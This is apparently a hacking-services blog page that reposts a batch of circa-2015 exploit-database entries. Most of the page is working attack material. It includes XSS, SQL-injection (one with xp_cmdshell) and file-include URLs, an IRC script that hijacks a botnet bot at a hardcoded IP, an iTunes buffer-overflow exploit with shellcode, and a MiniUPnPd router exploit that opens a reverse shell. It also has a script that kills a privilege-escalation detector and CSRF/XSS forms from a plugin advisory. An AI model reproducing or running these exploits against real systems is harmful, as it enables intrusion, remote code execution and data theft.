Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863138636

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/52076/info

Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible. 

https://www.example.com/cgi-bin/openvpn_users.cgi?=[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/52076/info
 
Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
 
https://www.example.com/cgi-bin/dnat.cgi#createrule[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/52077/info

The X-Shop component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_x-shop&action=artdetail&idd='
HireHackking 
source: https://www.securityfocus.com/bid/52076/info
  
Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
  
Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
  
https://www.example.com/cgi-bin/dansguardian.cgi#addrule[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/52078/info

The Xcomp component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. 

http://www.example.com/index.php?option=com_xcomp&controller=../../[LFI]%00
HireHackking 
#
# legend_rce.py
# Legend Perl IRC Bot Remote Code Execution PoC
# author: Jay Turla ( @shipcod3 )
# description: This is a RCE PoC for Legend Bot which has been used in the Shellshock spam October 2014. 
# reference: http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html
# greetz to ROOTCON (rootcon.org) goons
#

import socket
import sys

def usage():
     print("USAGE: python legend_rce.py nick")
     print("Sample nicks found in the wild: god, ARZ, Zax, HackTech, TheChozen")
     
def main(argv):
    
    if len(argv) < 2:
        return usage()

    #irc server connection settings
    botnick = sys.argv[1] #admin payload for taking over the Legend Bot
    server = "80.246.50.71" #irc server
    channel = "#Apache" #channel where the bot is located

    irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket
    print "connecting to:"+server
    irc.connect((server, 2015)) #connects to the server, you can change the port by changing 2015 for example :)
    irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :legend.rocks\n") #user authentication
    irc.send("NICK "+ botnick +"\n") #sets nick
    irc.send("JOIN "+ channel +"\n") #join the chan
    irc.send("PRIVMSG "+channel+" :!legend @system 'uname -a' \n") #send the payload to the bot

    while 1:    #puts it in a loop
        text=irc.recv(2040)  #receive the text
        print text   #print text to console

        if text.find('PING') != -1:                          #check if 'PING' is found
            irc.send('PONG ' + text.split() [1] + '\r\n') #returns 'PONG' back to the server (prevents pinging out!)
        if text.find('!quit') != -1: #quit the Bot
            irc.send ("QUIT\r\n") 
            sys.exit()
        if text.find('Linux') != -1:                         
            irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n")
            irc.send ("QUIT\r\n")
            sys.exit()

if __name__ == "__main__":
    main(sys.argv)
HireHackking 
# Exploit Title: Apple Itunes PLS title buffer overflow
# Date: April 26 ,2015 (Day of disclosing this exploit code)
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Vendor Homepage: http://www.apple.com
# Software Link: http://www.apple.com/itunes/download/?id=890128564
# Version: 10.6.1.7
# Tested on: Windows Xp sp3
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Youtube : https://www.youtube.com/user/cutehack3r

header = "[Playlist]\r\n"
header << "NumberOfEntries=1\r\n"
header << "File1=http://www.panix.com/web/faq/multimedia/sample.mp3\r\n"
header << "Title1="

nseh_longer = "\xeb\x1E\x90\x90"
nseh_shorter = "\xeb\x06\x90\x90"
seh = 0x72d119de #pop pop ret from msacm32.drv
shell = "\xdd\xc1\xd9\x74\x24\xf4\xbb\x2b\x2b\x88\x37\x5a\x31\xc9" +
"\xb1\x33\x83\xea\xfc\x31\x5a\x13\x03\x71\x38\x6a\xc2\x79" +
"\xd6\xe3\x2d\x81\x27\x94\xa4\x64\x16\x86\xd3\xed\x0b\x16" +
"\x97\xa3\xa7\xdd\xf5\x57\x33\x93\xd1\x58\xf4\x1e\x04\x57" +
"\x05\xaf\x88\x3b\xc5\xb1\x74\x41\x1a\x12\x44\x8a\x6f\x53" +
"\x81\xf6\x80\x01\x5a\x7d\x32\xb6\xef\xc3\x8f\xb7\x3f\x48" +
"\xaf\xcf\x3a\x8e\x44\x7a\x44\xde\xf5\xf1\x0e\xc6\x7e\x5d" +
"\xaf\xf7\x53\xbd\x93\xbe\xd8\x76\x67\x41\x09\x47\x88\x70" +
"\x75\x04\xb7\xbd\x78\x54\xff\x79\x63\x23\x0b\x7a\x1e\x34" +
"\xc8\x01\xc4\xb1\xcd\xa1\x8f\x62\x36\x50\x43\xf4\xbd\x5e" +
"\x28\x72\x99\x42\xaf\x57\x91\x7e\x24\x56\x76\xf7\x7e\x7d" +
"\x52\x5c\x24\x1c\xc3\x38\x8b\x21\x13\xe4\x74\x84\x5f\x06" +
"\x60\xbe\x3d\x4c\x77\x32\x38\x29\x77\x4c\x43\x19\x10\x7d" +
"\xc8\xf6\x67\x82\x1b\xb3\x98\xc8\x06\x95\x30\x95\xd2\xa4" +
"\x5c\x26\x09\xea\x58\xa5\xb8\x92\x9e\xb5\xc8\x97\xdb\x71" +
"\x20\xe5\x74\x14\x46\x5a\x74\x3d\x25\x3d\xe6\xdd\x84\xd8" +
"\x8e\x44\xd9"
#1020 --> offset in local exploits 
payload = header + "A" * 1020 + nseh_shorter + [seh].pack('V') + shell 
#380  or 404 (if itunes wasn't already loaded)--> offset in remote ones using the itms protocol.
payload_remote =  header + "A" * 380 + nseh_longer + [seh].pack('V') + "A" * 16 + nseh_shorter + [seh].pack('V') +  shell 

# when using as local exploit
open('exploit.pls', 'w') { |f|
  f.puts payload
}
puts('local file created')

# place this in a web server and use the itms:// protocol to load it.
open('exploit_remote.pls', 'w') { |f|
  f.puts payload_remote
}
puts('remote file created')
HireHackking 
#!/usr/bin/env python

# Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series
# Date: 26.04.2015
# Exploit Author: Onur ALANBEL (BGA)
# Vendor Homepage: http://miniupnp.free.fr/
# Version: 1.0
# Architecture: MIPS
# Tested on: AirTies RT-204v3
# CVE : 2013-0230
# Exploit gives a reverse shell to lhost:lport
# Details: https://www.exploit-db.com/docs/english/36806-developing-mips-exploits-to-hack-routers.pdf

import urllib2
from string import join
from argparse import ArgumentParser
from struct import pack
from socket import inet_aton

BYTES = 4


def hex2str(value, size=BYTES):
    data = ""

    for i in range(0, size):
        data += chr((value >> (8*i)) & 0xFF)

    data = data[::-1]

    return data


arg_parser = ArgumentParser(prog="miniupnpd_mips.py", description="MiniUPnPd \
                            CVE-2013-0230 Reverse Shell exploit for AirTies \
                            RT Series, start netcat on lhost:lport")
arg_parser.add_argument("--target", required=True, help="Target IP address")
arg_parser.add_argument("--lhost", required=True, help="The IP address\
                        which nc is listening")
arg_parser.add_argument("--lport", required=True, type=int, help="The\
                        port which nc is listening")

args = arg_parser.parse_args()

libc_base = 0x2aabd000
ra_1 = hex2str(libc_base + 0x36860)     # ra = 1. gadget
s1 = hex2str(libc_base + 0x1636C)       # s1 = 2. gadget
sleep = hex2str(libc_base + 0x35620)    # sleep function
ra_2 = hex2str(libc_base + 0x28D3C)     # ra = 3. gadget
s6 = hex2str(libc_base + 0x1B19C)       # ra = 4.gadget
s2 = s6
lport = pack('>H', args.lport)
lhost = inet_aton(args.lhost)

shellcode = join([
    "\x24\x11\xff\xff"
    "\x24\x04\x27\x0f"
    "\x24\x02\x10\x46"
    "\x01\x01\x01\x0c"
    "\x1e\x20\xff\xfc"
    "\x24\x11\x10\x2d"
    "\x24\x02\x0f\xa2"
    "\x01\x01\x01\x0c"
    "\x1c\x40\xff\xf8"
    "\x24\x0f\xff\xfa"
    "\x01\xe0\x78\x27"
    "\x21\xe4\xff\xfd"
    "\x21\xe5\xff\xfd"
    "\x28\x06\xff\xff"
    "\x24\x02\x10\x57"
    "\x01\x01\x01\x0c"
    "\xaf\xa2\xff\xff"
    "\x8f\xa4\xff\xff"
    "\x34\x0f\xff\xfd"
    "\x01\xe0\x78\x27"
    "\xaf\xaf\xff\xe0"
    "\x3c\x0e" + lport +
    "\x35\xce" + lport +
    "\xaf\xae\xff\xe4"
    "\x3c\x0e" + lhost[:2] +
    "\x35\xce" + lhost[2:4] +
    "\xaf\xae\xff\xe6"
    "\x27\xa5\xff\xe2"
    "\x24\x0c\xff\xef"
    "\x01\x80\x30\x27"
    "\x24\x02\x10\x4a"
    "\x01\x01\x01\x0c"
    "\x24\x0f\xff\xfd"
    "\x01\xe0\x78\x27"
    "\x8f\xa4\xff\xff"
    "\x01\xe0\x28\x21"
    "\x24\x02\x0f\xdf"
    "\x01\x01\x01\x0c"
    "\x24\x10\xff\xff"
    "\x21\xef\xff\xff"
    "\x15\xf0\xff\xfa"
    "\x28\x06\xff\xff"
    "\x3c\x0f\x2f\x2f"
    "\x35\xef\x62\x69"
    "\xaf\xaf\xff\xec"
    "\x3c\x0e\x6e\x2f"
    "\x35\xce\x73\x68"
    "\xaf\xae\xff\xf0"
    "\xaf\xa0\xff\xf4"
    "\x27\xa4\xff\xec"
    "\xaf\xa4\xff\xf8"
    "\xaf\xa0\xff\xfc"
    "\x27\xa5\xff\xf8"
    "\x24\x02\x0f\xab"
    "\x01\x01\x01\x0c"
    ], '')

payload = 'C'*2052 + s1 + 'C'*(4*4) + s6 + ra_1 + 'C'*28 + sleep + 'C'*40 + s2\
    + ra_2 + 'C'*32 + shellcode


soap_headers = {
    'SOAPAction': "n:schemas-upnp-org:service:WANIPConnection:1#" + payload,
}

soap_data = """
    <?xml version='1.0' encoding="UTF-8"?>
    <SOAP-ENV:Envelope
    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    >
    <SOAP-ENV:Body>
    <ns1:action xmlns:ns1="urn:schemas-upnp-org:service:WANIPConnection:1"\
        SOAP-ENC:root="1">
    </ns1:action>
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
    """

try:
    print "Exploiting..."
    req = urllib2.Request("http://" + args.target + ":5555", soap_data,
                          soap_headers)
    res = urllib2.urlopen(req).read()
except:
    print "Ok"
HireHackking 
#!/usr/bin/python
# EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC
# AUTHOR: Avinash Kumar Thapa "-Acid"
# Date of Testing: 26th April'2015
# Vendor Homepage: http://www.wireshark.org
# Tested On : Windows 8.1 Pro
# Steps to Reproduce the Crash
# Step 1: Create a File Using PoC
# Step 2: Go to wirehshark and in filter field, put ip.addr=={Buffer}
# Step 3: Click "Apply"
# Some other places for the Crash are:
# Statistics > IP Statistics then any of the field you can use.
# Statistics > Packet Length > Paste the buffer in the field
# Statistics > ANCP
# Statistics > Collectd
# Statistics > Compared
# Statistis  > 


buffer = "A"*80000

file = open("wireshark.txt","w")
file.write(buffer)
file.close()

print "POC Created by -Acid"
print " Email: acid.exploit@gmail.com"
HireHackking 
# Exploit Title: UniPDF v1.2 BufferOverflow, SEH overwrite DoS PoC
# Author : Avinash Kumar Thapa "-Acid"
# Date of Testing :  25th April 2015
# Tested On : Windows XP- Service Pack 3 && Windows 7 Home Basic
# Vendor Homepage: http://unipdf.com/
# Software Link: http://unipdf.com/file/unipdf-setup.exe
# Steps to reproduce the Crash is:
#   Step 1: Run the POC
#   Step 2: Go to local Disk C:\Program Files\UniPDF and copy the POC there
#   Step 3 : Run the UniPdf.exe 

buff2 = "\x41" * 3000
crash = "      <config>\n"
crash +=  "         <UserDefine>\n"
crash  +=               "<Language ID=\"0\" />\n"
crash +=                "<Path PathSet=\""+buff2+"\" Path=\"\" />\n"
crash +=                "<ImageFormat set=\"2\" />\n"
crash +=                "<Res set=\"96\" />\n"
crash +=                "<bit set=\"24\" />\n"
crash +=                "<Prefix set=\"\" />\n"
crash +=                "<Doc set=\"1\" />\n"
crash +=                "<Help set=\"1\" />\n"
crash +=             "</UserDefine>\n"
crash +=        "</config>\n"

print "POC Created By -Acid"
print " acid.exploit@gmail.com" 
file = open("update.xml","w")
file.write(crash)
file.close()
HireHackking 
# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS
# Date: 28.01.2014
# Exploit Author: Adam Ziaja http://adamziaja.com
# Vendor Homepage: https://www.otrs.com
# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5
# CVE : CVE-2014-1695

#!/usr/bin/perl -w
use strict;
use MIME::Lite;
my $msg = MIME::Lite->new(
    Subject => 'OTRS XSS PoC',
    From => 'attacker@example.com',
    To => 'otrs@example.com',
    Type => 'text/html',
    Data =>
        '<html><body><img/onerror="alert(\'XSS1\')"src=a><iframe
src=javasc&#x72ipt:alert(\'XSS2\') ></body></html>'
);
$msg->send();
HireHackking 
Source: http://klikki.fi/adv/wordpress2.html


## Overview
Current versions of WordPress are vulnerable to a stored XSS.  An unauthenticated attacker can inject JavaScript in 
WordPress comments. The script is triggered when the comment is viewed.

If triggered by a logged-in administrator, under default settings the attacker can leverage the vulnerability to 
execute arbitrary code on the server via the plugin and theme editors.

Alternatively the attacker could change the administrator’s password, create new administrator accounts, 
or do whatever else the currently logged-in administrator can do on the target system.



## Details
If the comment text is long enough, it will be truncated when inserted in the database. 
The MySQL TEXT type size limit is 64 kilobytes, so the comment has to be quite long.

The truncation results in malformed HTML generated on the page. 
The attacker can supply any attributes in the allowed HTML tags, in the same way 
as with the two recently published stored XSS vulnerabilities affecting the WordPress core.

The vulnerability bears a similarity to the one reported by Cedric Van Bockhaven in 
2014 (patched this week, after 14 months). Instead of using an invalid character to truncate 
the comment, this time an excessively long comment is used for the same effect.

In these two cases, the injected JavaScript apparently can't be triggered in the 
administrative Dashboard so these exploits seem to require getting around comment 
moderation e.g. by posting one harmless comment first.

The similar vulnerability released by Klikki in November 2014 could be exploited in the 
administrative Dashboard while the comment is still in the moderation queue. Some 
exploit attempts of this have been recently reported in the wild.



## Proof of Concept
Enter as a comment text:

  <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px  AAAAAAAAAAAA...[64 kb]..AAA'></a>

Confirmed vulnerable: WordPress 4.2, 4.1.2, 4.1.1, 3.9.3. 
Tested with MySQL versions 5.1.53 and 5.5.41.



## Demo
https://www.youtube.com/watch?v=OCqQZJZ1Ie4
HireHackking 
# iFTP 2.21 SEH overwritten Crash PoC
# Author: Avinash Kumar Thapa "-Acid"
# Date of Testing :  28th April'2015
# Vendor's home page: http://www.memecode.com/iftp.php
# Software's Url: http://www.memecode.com/data/iftp-win32-v2.21.exe
# Crash Point: Go to Schedule > Schedule download > {+} >Time field


buffer = "A"*600

buffer += "BBBB" # Pointer to Next SEH Record

buffer += "CCCC" # SEH HANDLER


file = "test.txt"

f = open(file, "w")

f.write(buffer)

f.close()
HireHackking 
source: https://www.securityfocus.com/bid/52079/info

Tiki Wiki CMS Groupware is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.

A successful exploit may aid in phishing attacks; other attacks are possible. 

http://www.example.com/tiki-featured_link.php?type=f&url=http://www.example2.com
HireHackking 
source: https://www.securityfocus.com/bid/52081/info

VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.

An remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; These may aid in further attacks.

VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected. 

http://www.example.com/voxlog/GET.PHP?v=ZmlsZT1DOi9ib290LmluaQ==
HireHackking 
source: https://www.securityfocus.com/bid/52085/info

F*EX is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible. 

http://www.example.com/fup [id parameter]
http://www.example.com/fup [to parameter]
http://www.example.com/fup [from parameter]
HireHackking 
source: https://www.securityfocus.com/bid/52081/info
 
VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
 
An remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; These may aid in further attacks.
 
VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected. 


http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);waitfor delay '0:0:5' --+

http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);exec master..xp_cmdshell 'xxxxx' --+
HireHackking 
source: https://www.securityfocus.com/bid/52086/info

TestLink is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

http://www.example.com/lib/ajax/getrequirementnodes.php?root_node=1 OR 1=1
http://www.example.com/lib/ajax/gettprojectnodes.php?root_node=4 OR 1=1
http://www.example.com/lib/cfields/cfieldsEdit.php?do_action=edit&cfield_id=1 AND
3653=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/plan/planMilestonesEdit.php?doAction=edit&id=7
AND 5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/plan/planMilestonesEdit.php?doAction=create&tplan_id=2623
AND 5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/requirements/reqEdit.php?doAction=create&req_spec_id=2622
AND 5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/requirements/reqImport.php?req_spec_id=2622 AND
5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/requirements/reqSpecAnalyse.php?req_spec_id=2622
OR 1=1
http://www.example.com/lib/requirements/reqSpecPrint.php?req_spec_id=2622
AND 5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/requirements/reqSpecView.php?req_spec_id=2622 AND
5912=BENCHMARK(5000000,MD5(1))
HireHackking 
source: https://www.securityfocus.com/bid/52088/info

Dolphin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Dolphin 7.0.7 and prior versions are vulnerable. 

http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&photos_only='"><script>alert(/xss/)</script>
http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&online_only='"><script>alert(/xss/)</script>
http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&sort=activity&mode='"><script>alert(/xss/)</script>
HireHackking 
source: https://www.securityfocus.com/bid/52088/info
 
Dolphin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
 
Dolphin 7.0.7 and prior versions are vulnerable. 

http://www.example.com/dolph/explanation.php?explain=%27%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
HireHackking 
#[Title] Ninja privilege escalation detection and prevention system race condition
#[Author] Ben 'highjack' Sheppard
#[URL] http://highjack.github.io/
#[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.
#It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
#The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
#[Software Link] http://forkbomb.org/ninja/
#[Date] 29/04/2015
#[Version] 0.1.3
#[Tested on] Kali Linux
#[Demo] https://www.youtube.com/watch?v=P8VJCUUJPLg

#See me hitting every open port, 'cause im banging on their system while I'm staying out of the court
#https://www.youtube.com/watch?v=eA136fOsSeQ

import pty, os, sys, subprocess
pid, fd = pty.fork()

#begin config
user = "root"
password  = "mypassword" #change this :)
command = "killall -9 ninja"
#end config


def usage():
	print """
@@@  @@@  @@@   @@@@@@@@  @@@  @@@       @@@   @@@@@@    @@@@@@@  @@@  @@@  
@@@  @@@  @@@  @@@@@@@@@  @@@  @@@       @@@  @@@@@@@@  @@@@@@@@  @@@  @@@  
@@!  @@@  @@!  !@@        @@!  @@@       @@!  @@!  @@@  !@@       @@!  !@@  
!@!  @!@  !@!  !@!        !@!  @!@       !@!  !@!  @!@  !@!       !@!  @!!  
@!@!@!@!  !!@  !@! @!@!@  @!@!@!@!       !!@  @!@!@!@!  !@!       @!@@!@!   
!!!@!!!!  !!!  !!! !!@!!  !!!@!!!!       !!!  !!!@!!!!  !!!       !!@!!!    
!!:  !!!  !!:  :!!   !!:  !!:  !!!       !!:  !!:  !!!  :!!       !!: :!!   
:!:  !:!  :!:  :!:   !::  :!:  !:!  !!:  :!:  :!:  !:!  :!:       :!:  !:!  
::   :::   ::   ::: ::::  ::   :::  ::: : ::  ::   :::   ::: :::   ::  :::  
 :   : :  :     :: :: :    :   : :   : :::     :   : :   :: :: :   :   ::: 
 
[Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition
[Author] Ben 'highjack' Sheppard
[URL] http://highjack.github.io/
 
[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.
It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
 """
 

executions = 0
def check_procs():
	p1 = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE)
	p2 = subprocess.Popen(["grep", "root"],  stdin=p1.stdout,  stdout=subprocess.PIPE)
	p3 = subprocess.Popen(["grep", "/sbin/ninja"], stdin=p2.stdout, stdout=subprocess.PIPE)
	output = p3.communicate()[0]
	if output != "":
		if executions != 0:
			sys.exit(0)
		return True
	else:
		return False

def kill_ninja():
	if pid == 0:
		os.execvp("su", ["su", user, "-c", command])
	elif pid > 0:
		try:
			os.read(fd, 1024)
			os.write(fd, password + "\n")
			os.read(fd,1024)
			os.wait()
			os.close(fd)
		except:
			usage()
			print "[+] Ninja is terminated"
			sys.exit(0)
			

while True:
	kill_ninja()
	if (check_procs == True):
		executions = executions + 1
		kill_ninja()
HireHackking 
source: https://www.securityfocus.com/bid/52091/info

The 'com_xvs' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 

http://www.example.com/index.php?option=com_xvs&controller=../../[LFI]%00
HireHackking 
#####################################################################################

Application:   Foxit Reader PDF Parsing  Memory Corruption

Platforms:   Windows

Versions:   The vulnerabilities are reported in Foxit Reader and Foxit Enterprise Reader versions 7.1.0.306 and 7.1.3.320 and Foxit Phantom PDF versions 7.1.0.306, 7.1.2.311, and 7.1.3.320.

Secunia:   SA63346

{PRL}:   2015-05

Author:   Francis Provencher (Protek Research Lab’s)

Website:   http://www.protekresearchlab.com/

Twitter:   @ProtekResearch

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

===============
1) Introduction
===============

Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files.[3] Early versions of Foxit Reader were notable for startup performance and small file size.[citation needed] Foxit has been compared favorably toAdobe Reader.[4][5][6] The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing.

(http://en.wikipedia.org/wiki/Foxit_Reader)

#####################################################################################

============================
2) Report Timeline
============================

2015-04-09: Francis Provencher from Protek Research Lab’s found the issue;
2015-04-13: Foxit Security Response Team confirmed the issue;
2015-04-28: Foxit fixed the issue;
#####################################################################################

============================
3) Technical details
============================

A memory corruption occured within the LZW algorithm that is used to decode GIF. A specifically crafted GIF could lead to a controled memory corruption.

#####################################################################################

===========

4) POC

===========

http://protekresearchlab.com/exploits/PRL-2015-05.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36859.pdf


###############################################################################
HireHackking 
Advisory ID: HTB23254
Product: TheCartPress WordPress plugin
Vendor: TheCartPress team
Vulnerable Version(s): 1.3.9 and probably prior
Tested Version: 1.3.9
Advisory Publication:  April 8, 2015  [without technical details]
Vendor Notification: April 8, 2015 
Public Disclosure: April 29, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79], Improper Access Control [CWE-284]
CVE References: CVE-2015-3301, CVE-2015-3300, CVE-2015-3302
Risk Level: High 
CVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in TheCartPress WordPress plugin, which can be exploited to execute arbitrary PHP code, disclose sensitive data, and perform Cross-Site Scripting attacks against users of WordPress installations with the vulnerable plugin.

1) Local PHP File Inclusion in TheCartPress WordPress plugin: CVE-2015-3301

Input passed via the "tcp_box_path" HTTP POST parameter passed to "/wp-admin/admin.php?page=checkout_editor_settings" URL is not properly verified before being used in PHP 'include()' function, and can be abused to include arbitrary local files via directory traversal sequences.

In order to successfully exploit the vulnerability an attacker needs to have administrator privileges on WordPress installation, however this can be also exploited via CSRF vector to which the script is vulnerable as well. 

Simple CSRF exploit below will execute the content of '/etc/passwd' file when a logged-in administrator will visit a page with it:

<form action="http://wordpress/wp-admin/admin.php?page=checkout_editor_settings" method="post" name="main">
<input type="hidden" name="tcp_save_fields"  value='1'>
<input type="hidden" name="tcp_box_path"  value='../../../../../etc/passwd'>
<input type="submit" id="btn">
</form>
<script>
 document.main.submit();
</script>



2) Stored XSS in TheCartPress WordPress plugin: CVE-2015-3300

During the checkout process, many user-supplied HTTP POST parameters (see complete list in PoC)in "Shipping address" and "Billing address" sections are not being sanitized before being stored in the local database. 

Simple mass-XSS PoC against "Billing address" section (PoC against "Shipping address" scetion is identical, just replace 'billing_' prefix with 'shipping_') will write several JS pop-up alerts into the application database:

<form action="http://wordpress/shopping-cart/checkout/" method="post" name="main">
<input type="hidden" name="selected_billing_id"  value='1'>
<input type="hidden" name="selected_billing_address"  value='new'>
<input type="hidden" name="billing_firstname"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_lastname"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_company"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_tax_id_number"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_country_id"  value='AF'>
<input type="hidden" name="billing_region_id"  value=''>
<input type="hidden" name="billing_region"  value=''>
<input type="hidden" name="billing_city"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_street"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_street_2"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_postcode"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_telephone_1"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_telephone_2"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_fax"  value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_email"  value='mail@mail.com'>
<input type="hidden" name="tcp_continue"  value=''>
<input type="hidden" name="tcp_step"  value='1'>
<input type="submit" id="btn">
</form>


A non-authenticated attacker may inject malicious HTML and JS code that will be stored in the application database, and available to any non-authenticated user on the following URL:

http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order

As well as on the following URL accessible to WordPress administrator only:

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/OrdersListTable.php


3) Improper Access Control in TheCartPress WordPress plugin: CVE-2015-3302

Any non-authenticated user may browse orders of other users due to broken authentication mechanism. To reproduce the vulnerability an attacker shall first open the following URL:
http://wordpress/shopping-cart/checkout/?tcp_checkout=ok&order_id=[order_id]

And just after open the following URL to see full order details:
http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order

Moreover, the order ID can be easily predicted, as every new order ID is an incremented value of the previous one. This enables non-authenticated remote attacker to steal all currently-existing orders.


